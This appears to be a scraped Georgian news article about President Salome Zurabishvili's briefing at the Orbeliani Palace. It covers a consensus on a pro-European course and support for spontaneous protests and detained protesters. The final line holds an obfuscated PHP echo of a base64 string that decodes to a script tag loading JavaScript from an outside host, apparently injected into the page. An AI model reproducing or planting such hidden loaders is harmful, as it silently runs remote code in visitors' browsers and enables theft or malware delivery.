gorgia
ავერსი jaluzi

ორბელიანების სასახლეში შედგა ეროვნული თანხმობა იმის შესახებ, დღეს რა გვაქვს გასაკეთებელი, - ამის შესახებ საქართველოს პრეზიდენტმა სალომე ზურაბიშვილმა გამართულ ბრიფინგზე განაცხადა.

ზურაბიშვილის თქმით, "ეს თანხმობა არის, პირველ რიგში, იმის ნიშანი, რომ ჩვენ არ მივდივართ რუსეთისკენ, მივდივართ ევროპისკენ".

"საზოგადოებას, რომელიც გარეთ დგას, მინდა ვუსურვო მშვიდობა და მხნეობა.

როგორც გუშინ მქონდა ნათქვამი, მოვიწვიე ქარტიის პოლიტიკური პარტიები და საზოგადოების სხვადასხვა წარმომადგენელი, არასამთავრობო და სამოქალაქო სექტორის წარმომადგენლები. ეს არის იმის დასტური, რომ აქაც, ორბელიანების სასახლეში შედგა ეროვნული თანხმობა იმის შესახებ თუ დღეს რა გვაქვს გასაკეთებელი, საით მივდივართ და საით არა. ეს თანხმობა არის, პირველ რიგში, იმის ნიშანი, რომ ჩვენ არ მივდივართ რუსეთისკენ, მივდივართ ევროპისკენ, რაც იყო ჩვენი, ყველსა გამოცხადებული მიზანი და თუ ვინმემ გადაუხვია, საზოგადოებას არ გადაუხვევია და რჩება ამ მიზნის ერთგული", - განაცხადა პრეზიდენტმა. 

მისი თქმით, რასაც აქციებზე ვხედავთ, ეს ცივილიზებულ ქვეყანაში სრულიად მიუღებელია.
„ჩვენ განვიხილეთ პროტესტი, რომელიც ქუჩაში მიმდინარეობს და რომელიც სრულიად დამოუკიდებელ პროცესია პოლიტიკური პარტიებისგან და რაიმე ორგანიზაციისგან. თვითორგანიზებული და სპონტანურია, რაც ძალიან კარგად ჩანს იმაში, რომ პრაქტიკულად, დღეს არ არის ქალაქი საქართველოში, რომელიც არ არის ჩართული ამ პროტესტში. მოიცავს ყველა თაობას, პროფესიასა და სოციალურ სფეროს. ეს სამოქალაქო პროტესტი უნდა დარჩეს როგორიც არის თავისი სპონტანურობით, თავისუფლებითა და თვითორგანიზებით. ყველა შევთანხმდით, რომ არ სჭირდება არანაირი პოლიტიკური პარტიების და არც ჩემი ჩარევა, მაგრამ სჭირდება მხარდაჭერა და დაცვა. მხარდაჭერა რაშიც უნდა გამოიხატებოდეს, ეს პირველ რიგში არის საზოგადოების, არასამთავრობოების და იურისტების საქმე, რომლებიც ასევე წარმოდგენილი იყვნენ. მორალური ვალდებულებაა იმ ადამიანების პირდაპირი მნიშვნელობით სამართლებრივი დაცვა, რომლებიც დაკავებულები არიან. მათი არდავიწყება ასევე ჩემი ვალდებულებაა. ყველა უწყებას უნდა მივმართოთ, რომ ვინც დაშავდა ყველა უნდა იყოს დაცული. ჩემი პირდაპირი მოვალეობაა, რომ ჩვენ საერთაშორისო პარტნიორებთან ამ ძალადობის მიმართ და წინააღმდეგ მათი ხმაც ისმოდეს. რასაც ჩვენ ვხედავთ, ეს არის ცივილიზებულ ქვეყანაში სრულიად მიუღებელი“, - განაცხადა სალომე ზურაბიშვილმა.
94
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");